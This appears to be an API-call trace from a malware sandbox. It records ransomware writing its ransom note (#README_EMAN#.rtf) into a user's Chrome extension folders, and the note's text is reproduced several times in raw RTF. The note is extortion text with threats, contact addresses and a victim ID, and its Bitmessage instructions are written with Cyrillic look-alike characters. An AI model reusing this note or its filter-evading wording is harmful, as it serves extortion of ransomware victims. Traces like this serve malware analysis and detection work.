\\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.163] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.163] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.164] CloseHandle (hObject=0x2ec) returned 1 [0291.164] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\#readme_eman#.rtf")) returned 0xffffffff [0291.164] GetLastError () returned 0x2 [0291.164] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.165] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us 